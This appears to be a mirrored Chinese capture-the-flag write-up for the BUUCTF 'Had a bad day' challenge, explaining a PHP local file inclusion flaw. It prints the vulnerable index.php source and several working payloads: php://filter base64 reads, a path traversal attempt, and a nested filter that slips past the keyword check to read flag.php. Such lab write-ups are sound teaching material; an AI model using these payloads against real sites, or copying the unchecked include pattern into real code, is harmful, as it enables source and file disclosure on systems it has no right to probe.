zoukankan      html  css  js  c++  java

  • BUUCTF-[BSidesCF 2020]Had a bad day(文件包含)

    打开靶机,有2个按钮

    点击按钮,url会发生变化

    尝试利用php://filter伪协议获取index.php源码

    php://filter/read=convert.base64-encode/resource=index.php


    报错,去掉后缀
    进行base64 decode,得到index.php:

    <?php
	$file = $_GET['category'];
	if(isset($file)){
		if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index"))
		{
			include ($file . '.php');
		}
		else{
			echo "Sorry, we currently only support woofers and meowers.";
		}
	}
?>

    直接读flag.php,?category=woofers/../flag,页面没啥变化,F12
    发现源码中有多出东西,说明flag.php确实是成功包含了



    !!!php://filter伪协议嵌套,套一层要求的$file
    php://filter/read=convert.base64-encode/woofers/resource=flag
  • 相关阅读:
    配置管理puppet
    ruby安装
    angularjs 安装篇
    idea 快捷键
    rabbitmq java queue
    spring cloud bus rabbitmq
    rabbitmq 安装篇
    spring cloud eureka
    spring cloud config
    postgre 导入sql文件
  • 原文地址:https://www.cnblogs.com/wrnan/p/12860233.html
Copyright © 2011-2022 走看看